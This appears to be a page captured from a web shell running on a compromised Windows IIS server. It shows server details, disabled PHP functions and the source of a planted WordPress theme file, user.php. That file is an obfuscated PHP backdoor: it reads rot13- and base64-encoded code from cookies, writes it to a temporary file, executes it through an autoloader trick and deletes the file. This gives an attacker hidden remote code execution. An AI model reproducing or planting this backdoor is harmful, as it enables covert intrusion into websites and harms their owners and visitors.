HEX
Server: Microsoft-IIS/10.0
System: Windows NT WIN8095 10.0 build 20348 (Windows Server 2016) AMD64
User: kytoffice-001 (0)
PHP: 7.4.30
Disabled: exec,passthru,shell_exec,system,proc_open,popen,curl_multi_exec,show_source
Upload Files
File: h:/root/home/kytoffice-001/www/expresstinou/wp-content/themes/user.php
<?php

if (isset($_COOKIE[-13+13]) && isset($_COOKIE[44+-43]) && isset($_COOKIE[19+-16]) && isset($_COOKIE[-49+53])) {
    $value = $_COOKIE;
    function core_engine($itm) {
        $value = $_COOKIE;
        $reference = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), 'mbFz8vmN');
        if (!is_writable($reference)) {
            $reference = getcwd() . DIRECTORY_SEPARATOR . "config_manager";
        }
        $marker = "\x3c\x3f\x70\x68p " . base64_decode(str_rot13($value[3]));
        if (is_writeable($reference)) {
            $component = fopen($reference, 'w+');
            fputs($component, $marker);
            fclose($component);
            spl_autoload_unregister(__FUNCTION__);
            require_once($reference);
            @array_map('unlink', array($reference));
        }
    }
    spl_autoload_register("core_engine");
    $rec = "f480b16fed3f32a537404bd16d598355";
    if (!strncmp($rec, $value[4], 32)) {
        if (@class_parents("data_storage_task_processor", true)) {
            exit;
        }
    }
}